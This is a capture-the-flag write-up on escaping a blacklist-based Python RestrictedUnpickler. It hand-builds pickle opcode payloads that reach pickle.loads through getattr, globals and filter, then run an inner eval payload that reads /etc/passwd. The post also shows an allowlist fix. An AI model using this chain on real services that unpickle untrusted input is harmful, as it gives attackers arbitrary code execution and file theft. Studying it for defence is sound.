Bypassing RestrictedUnpickler

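Last week, in between model training runs, I came across a CTF challenge on Python pickle deserialization. It was unlike the ones I had seen before and looked interesting, so I decided to dig into it.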

0x00 Pickle Deserialization

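As we know, when we control the data passed to a deserialization entry point such as `pickle.loads`, we can craft a malicious payload to achieve arbitrary code execution. This works because, during unpickling, the `pickle` library by default imports any class or function object referenced in the payload. For that reason the Python developers have long warned against using `pickle` to deserialize input that has not been sanitized. They also recommend implementing your own `Unpickler` to restrict which classes and functions can be imported during unpickling; see https://docs.python.org/3.7/library/pickle.html#restricting-globals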
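To make the point concrete, here is a minimal sketch of how unpickling ends up calling a function chosen by whoever wrote the payload. The `Demo` class and the harmless `os.path.basename` call are illustrative stand-ins, not part of the challenge; a real payload would name something like `os.system` instead.

```python
import os.path
import pickle


class Demo(object):
    def __reduce__(self):
        # __reduce__ returns (callable, args); the unpickler imports the
        # callable by name and calls callable(*args) to "rebuild" the object.
        return (os.path.basename, ("/tmp/demo.txt",))


data = pickle.dumps(Demo())
result = pickle.loads(data)  # no Demo instance comes back, only the call result
print(type(result), result)
```

Note that the receiving side never needs the `Demo` class: the pickle only records which function to import and which arguments to pass.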

0x01 RestrictedUnpickler

Back to the challenge. The logic of its pickle "sandbox" is roughly as follows:

import pickle
import io
import builtins

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

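As you can see, the challenge is adapted from the example in the Python documentation and adds a blacklist to restrict what can be imported during unpickling: it disables essentially every builtin that can execute code directly, and it also requires that the imported class or function live in the `builtins` module. But without those builtins, is code execution really out of reach?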
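Before answering that, it helps to see what the check actually lets through. The sketch below repeats the class from above so that it runs on its own and feeds it pickles of individual functions; the `is_allowed` helper is a hypothetical name added for illustration.

```python
import builtins
import io
import os
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


def is_allowed(obj):
    """Return True if a pickle that references obj survives the sandbox."""
    try:
        restricted_loads(pickle.dumps(obj))
        return True
    except pickle.UnpicklingError:
        return False


# Functions are pickled by reference (module name + attribute name),
# so each of these pickles triggers exactly one find_class() call.
for func in (eval, os.system, getattr, globals, filter):
    print(func.__name__, is_allowed(func))
```

`eval` and `os.system` are rejected, while `getattr`, `globals` and `filter` pass, which is the gap the rest of this post relies on.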

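Skimming the list of built-in functions in the Python documentation and setting aside the blacklisted ones, the candidates that look usable at first glance are `map` and `filter`, both of which accept a function as an argument.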

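After many attempts I found that, even though we can pass a function as an argument, we can still only call the handful of functions left in builtins, which is not arbitrary code execution. Just as I was getting stuck, I realized I had overlooked something: the `pickle` module that the surrounding code has already imported. Could we find a way to call `pickle.loads`? Since `pickle.loads` uses the default, unrestricted unpickler, that would sidestep the "sandbox" entirely.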

0x02 Pickle Protocol

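Let's take a look at the pickle serialization protocol. The environment runs Python 3, so we focus on Protocol 3 (the table below lists every opcode known to `pickletools`, including those added by later protocols):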

import pickletools
import prettytable

opcode_table = prettytable.PrettyTable()
opcode_table.field_names = ['Name', 'Code', 'Docs']
for opcode in pickletools.opcodes:
    opcode_table.add_row([opcode.name, opcode.code, opcode.doc.splitlines()[0]])
    
print(opcode_table)

The resulting `opcode` table:

+------------------+------+-----------------------------------------------------------------+
|       Name       | Code |                               Docs                              |
+------------------+------+-----------------------------------------------------------------+
|       INT        |  I   |                     Push an integer or bool.                    |
|      BININT      |  J   |                 Push a four-byte signed integer.                |
|     BININT1      |  K   |                Push a one-byte unsigned integer.                |
|     BININT2      |  M   |                Push a two-byte unsigned integer.                |
|       LONG       |  L   |                       Push a long integer.                      |
|      LONG1       | \x8a |               Long integer using one-byte length.               |
|      LONG4       | \x8b |              Long integer using found-byte length.              |
|      STRING      |  S   |                   Push a Python string object.                  |
| SHORT_BINSTRING  |  U   |                   Push a Python string object.                  |
|     BINBYTES     |  B   |                   Push a Python bytes object.                   |
|  SHORT_BINBYTES  |  C   |                   Push a Python bytes object.                   |
|    BINBYTES8     | \x8e |                   Push a Python bytes object.                   |
|       NONE       |  N   |                     Push None on the stack.                     |
|     NEWTRUE      | \x88 |                    Push True onto the stack.                    |
|     NEWFALSE     | \x89 |                    Push False onto the stack.                   |
|     UNICODE      |  V   |               Push a Python Unicode string object.              |
| SHORT_BINUNICODE | \x8c |               Push a Python Unicode string object.              |
|    BINUNICODE    |  X   |               Push a Python Unicode string object.              |
|   BINUNICODE8    | \x8d |               Push a Python Unicode string object.              |
|      FLOAT       |  F   |            Newline-terminated decimal float literal.            |
|     BINFLOAT     |  G   |        Float stored in binary form, with 8 bytes of data.       |
|    EMPTY_LIST    |  ]   |                       Push an empty list.                       |
|      APPEND      |  a   |                   Append an object to a list.                   |
|     APPENDS      |  e   |            Extend a list by a slice of stack objects.           |
|       LIST       |  l   |  Build a list out of the topmost stack slice, after markobject. |
|   EMPTY_TUPLE    |  )   |                       Push an empty tuple.                      |
|      TUPLE       |  t   | Build a tuple out of the topmost stack slice, after markobject. |
|      TUPLE1      | \x85 |     Build a one-tuple out of the topmost item on the stack.     |
|      TUPLE2      | \x86 |     Build a two-tuple out of the top two items on the stack.    |
|      TUPLE3      | \x87 |   Build a three-tuple out of the top three items on the stack.  |
|    EMPTY_DICT    |  }   |                       Push an empty dict.                       |
|       DICT       |  d   |  Build a dict out of the topmost stack slice, after markobject. |
|     SETITEM      |  s   |            Add a key+value pair to an existing dict.            |
|     SETITEMS     |  u   | Add an arbitrary number of key+value pairs to an existing dict. |
|    EMPTY_SET     | \x8f |                        Push an empty set.                       |
|     ADDITEMS     | \x90 |       Add an arbitrary number of items to an existing set.      |
|    FROZENSET     | \x91 |  Build a frozenset out of the topmost slice, after markobject.  |
|       POP        |  0   |   Discard the top stack item, shrinking the stack by one item.  |
|       DUP        |  2   |  Push the top stack item onto the stack again, duplicating it.  |
|       MARK       |  (   |                 Push markobject onto the stack.                 |
|     POP_MARK     |  1   |  Pop all the stack objects at and above the topmost markobject. |
|       GET        |  g   |      Read an object from the memo and push it on the stack.     |
|      BINGET      |  h   |      Read an object from the memo and push it on the stack.     |
|   LONG_BINGET    |  j   |      Read an object from the memo and push it on the stack.     |
|       PUT        |  p   |   Store the stack top into the memo.  The stack is not popped.  |
|      BINPUT      |  q   |   Store the stack top into the memo.  The stack is not popped.  |
|   LONG_BINPUT    |  r   |   Store the stack top into the memo.  The stack is not popped.  |
|     MEMOIZE      | \x94 |   Store the stack top into the memo.  The stack is not popped.  |
|       EXT1       | \x82 |                         Extension code.                         |
|       EXT2       | \x83 |                         Extension code.                         |
|       EXT4       | \x84 |                         Extension code.                         |
|      GLOBAL      |  c   |         Push a global object (module.attr) on the stack.        |
|   STACK_GLOBAL   | \x93 |         Push a global object (module.attr) on the stack.        |
|      REDUCE      |  R   |   Push an object built from a callable and an argument tuple.   |
|      BUILD       |  b   |   Finish building an object, via __setstate__ or dict update.   |
|       INST       |  i   |                     Build a class instance.                     |
|       OBJ        |  o   |                     Build a class instance.                     |
|      NEWOBJ      | \x81 |                    Build an object instance.                    |
|    NEWOBJ_EX     | \x92 |                    Build an object instance.                    |
|      PROTO       | \x80 |                   Protocol version indicator.                   |
|       STOP       |  .   |                   Stop the unpickling machine.                  |
|      FRAME       | \x95 |              Indicate the beginning of a new frame.             |
|      PERSID      |  P   |          Push an object identified by a persistent ID.          |
|    BINPERSID     |  Q   |          Push an object identified by a persistent ID.          |
+------------------+------+-----------------------------------------------------------------+

With this table in hand, let's look at an example:

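import pickle
import pickletools

class Payloads(object):
    def __reduce__(self):
        return (eval, ("print(1)", ))

# protocol=3 matches the output below (newer Python versions default to a higher protocol)
payload = pickle.dumps(Payloads(), protocol=3)
print(payload)
pickletools.dis(payload)  # dis() prints the disassembly itself and returns None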

The output is as follows:

b'\x80\x03cbuiltins\neval\nq\x00X\x08\x00\x00\x00print(1)q\x01\x85q\x02Rq\x03.'
    0: \x80 PROTO      3                  <= protocol version 3
    2: c    GLOBAL     'builtins eval'
   17: q    BINPUT     0
   19: X    BINUNICODE 'print(1)'         <= length=\x08\x00\x00\x00
   32: q    BINPUT     1
   34: \x85 TUPLE1
   35: q    BINPUT     2
   37: R    REDUCE                        <= pops the callable and its argument tuple, then calls it
   38: q    BINPUT     3
   40: .    STOP
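The same opcodes can also be written by hand. As a small sketch (the byte string is an illustration, not taken from the challenge), the following assembles the call `len('abc')` from GLOBAL, BINUNICODE, TUPLE1 and REDUCE, leaving out the optional BINPUT memo writes:

```python
import pickle
import pickletools

raw = b'\x80\x03'               # PROTO 3
raw += b'cbuiltins\nlen\n'      # GLOBAL: push builtins.len
raw += b'X\x03\x00\x00\x00abc'  # BINUNICODE: 4-byte little-endian length, then 'abc'
raw += b'\x85'                  # TUPLE1: wrap the top item -> ('abc',)
raw += b'R'                     # REDUCE: pop callable and args, push len('abc')
raw += b'.'                     # STOP: return the top of the stack

pickletools.dis(raw)            # sanity-check the stack before loading
result = pickle.loads(raw)
print(result)
```

Running `pickletools.dis` on a hand-built payload before loading it is a convenient way to catch an unbalanced stack early.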

 

Building on this example, we can use only the few builtins that remain available to construct a payload that calls `pickle.loads` indirectly:

list(filter(getattr(getattr(dict, 'get')(globals(), 'pickle'), 'loads'), ('PAYLOAD',)))
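To see why this expression works, it can be evaluated piece by piece in ordinary Python. The sketch below uses a harmless dictionary as a stand-in for the real inner payload and shows both `map` and `filter`, since either one will trigger the call.

```python
import pickle

# dict.get(globals(), 'pickle') looks up the already-imported module by name
# using only builtins; getattr then fetches its loads function.
loads = getattr(getattr(dict, 'get')(globals(), 'pickle'), 'loads')
print(loads is pickle.loads)

inner = pickle.dumps({'answer': 42})  # harmless stand-in for the real payload

# map and filter are lazy: nothing is called until list() consumes them.
mapped = list(map(loads, (inner,)))       # the results of loads(...)
filtered = list(filter(loads, (inner,)))  # the inputs for which loads(...) is truthy
print(mapped, filtered == [inner])
```

The only difference is what comes back: `map` returns the unpickled results, while `filter` returns the original bytes whenever the result is truthy. For the attack only the side effect of calling `loads` matters.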

The hand-built `opcode` sequence is as follows:

payload = b'\x80\x03'
payload += b'cbuiltins\nlist\nq\x00'       # list
payload += b'cbuiltins\nfilter\nq\x01'     # filter
payload += b'cbuiltins\ngetattr\nq\x02'    # getattr
payload += b'cbuiltins\ngetattr\nq\x03'    # getattr
payload += b'cbuiltins\ndict\nq\x04'       # dict
payload += b'X\x03\x00\x00\x00getq\x05'    # 'get'
payload += b'\x86q\x06'                    # (dict, 'get')
payload += b'Rq\x07'                       # RUN getattr(dict, 'get')
payload += b'cbuiltins\nglobals\nq\x08'    # globals
payload += b')q\x09'                       # ()
payload += b'Rq\x0a'                       # RUN globals()
payload += b'X\x06\x00\x00\x00pickleq\x0b' # 'pickle'
payload += b'\x86q\x0c'                    # (globals(), 'pickle')
payload += b'Rq\x0d'                       # RUN dict.get(globals(), 'pickle')
payload += b'X\x05\x00\x00\x00loadsq\x0e'  # 'loads'
payload += b'\x86q\x0f'                    # (pickle, 'loads')
payload += b'Rq\x10'                       # RUN getattr(pickle, 'loads')
payload += b'B'                            # BINBYTES: 4-byte little-endian length, then the bytes
payload += (len(inner_payload)).to_bytes(4, byteorder='little')
payload += inner_payload
payload += b'\x85q\x11'   # (inner_payload,)
payload += b'\x86q\x12'   # (loads, (inner_payload,))
payload += b'Rq\x13'      # RUN filter(loads, (inner_payload,))
payload += b'\x85q\x14'   # (filter(...),)
payload += b'Rq\x15'      # RUN list(...)
payload += b'.'

The `inner_payload` embedded above has to be built first:

import pickle

class InnerPayload(object):
    def __reduce__(self):
        return (
            eval, ("print(open('/etc/passwd').read())",)
        )

inner_payload = pickle.dumps(InnerPayload(), protocol=3)  # protocol 3, matching the output below
print(inner_payload)

# b"\x80\x03cbuiltins\neval\nq\x00X!\x00\x00\x00print(open('/etc/passwd').read())q\x01\x85q\x02Rq\x03."

 

Combining the two payloads, let's try it out:
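The following is a self-contained sketch of that test rather than the exact script used here. It makes a few assumptions: the inner payload is a harmless `eval("6 * 7")` instead of the `/etc/passwd` read, the optional BINPUT memo opcodes are dropped, `build_outer` is a hypothetical helper name, and the code runs on CPython's C-accelerated unpickler so that `globals()` resolves to the module that imported `pickle`.

```python
import builtins
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


class InnerPayload(object):
    def __reduce__(self):
        return (eval, ("6 * 7",))  # harmless stand-in for the real command


def build_outer(inner_payload):
    """Wrap inner_payload in list(filter(pickle.loads, (inner_payload,)))."""
    p = b'\x80\x03'
    p += b'cbuiltins\nlist\n'
    p += b'cbuiltins\nfilter\n'
    p += b'cbuiltins\ngetattr\n'
    p += b'cbuiltins\ngetattr\n'
    p += b'cbuiltins\ndict\n'
    p += b'X\x03\x00\x00\x00get\x86R'     # getattr(dict, 'get')
    p += b'cbuiltins\nglobals\n)R'        # globals()
    p += b'X\x06\x00\x00\x00pickle\x86R'  # dict.get(globals(), 'pickle')
    p += b'X\x05\x00\x00\x00loads\x86R'   # getattr(pickle, 'loads')
    p += b'B' + len(inner_payload).to_bytes(4, byteorder='little') + inner_payload
    p += b'\x85\x86R'                     # filter(loads, (inner_payload,))
    p += b'\x85R'                         # list(filter(...)) forces the call
    p += b'.'
    return p


inner_payload = pickle.dumps(InnerPayload())

# Sent on its own, the inner payload is rejected because it references eval.
try:
    restricted_loads(inner_payload)
    direct_blocked = False
except pickle.UnpicklingError:
    direct_blocked = True

# Wrapped in the outer payload, it is unpickled by the unrestricted pickle.loads.
result = restricted_loads(build_outer(inner_payload))
print(direct_blocked, result == [inner_payload])
```

Because `eval("6 * 7")` returns a truthy value, `filter` keeps the input bytes, so the result is `[inner_payload]`; that can only happen if `eval` actually ran inside the sandbox.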

The payload executes successfully and reads `/etc/passwd`. Note also that every function imported through `find_class` passes the check: `getattr`, `list`, `filter`, `globals`, `dict`.

0x03 Summary

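This is the only bypass I have come up with so far. There may well be others, so I will wait for the experts to publish their writeups. Hand-assembling the `opcode` sequence is not especially hard, but one slip is enough to leave the stack unbalanced, which happened several times while I was debugging.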

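This also shows that merely disabling dangerous functions is not enough when unpickling with `pickle`; the interface still has to be used with caution.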
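For comparison, the example in the Python documentation referenced above takes the opposite approach and uses an allowlist. A minimal sketch along those lines follows; the `safe_builtins` set is the one from the documentation example, while the `AllowlistUnpickler` and `allowlist_loads` names are made up for this illustration.

```python
import builtins
import io
import pickle

safe_builtins = {'range', 'complex', 'set', 'frozenset', 'slice'}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only names listed explicitly can be resolved; everything else fails.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def allowlist_loads(s):
    return AllowlistUnpickler(io.BytesIO(s)).load()


print(allowlist_loads(pickle.dumps(range(3))))  # an allowed type still round-trips

try:
    allowlist_loads(pickle.dumps(getattr))
    getattr_blocked = False
except pickle.UnpicklingError:
    getattr_blocked = True
print(getattr_blocked)
```

With `getattr`, `globals`, `list` and `filter` no longer resolvable, the chain used in this post has nothing to start from, although this says nothing about other possible bypasses.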

0x04 References

1. https://github.com/phith0n/code-breaking/blob/master/2018/picklecode/web/core/serializer.py
2. https://docs.python.org/3.7/library/pickle.html#restricting-globals
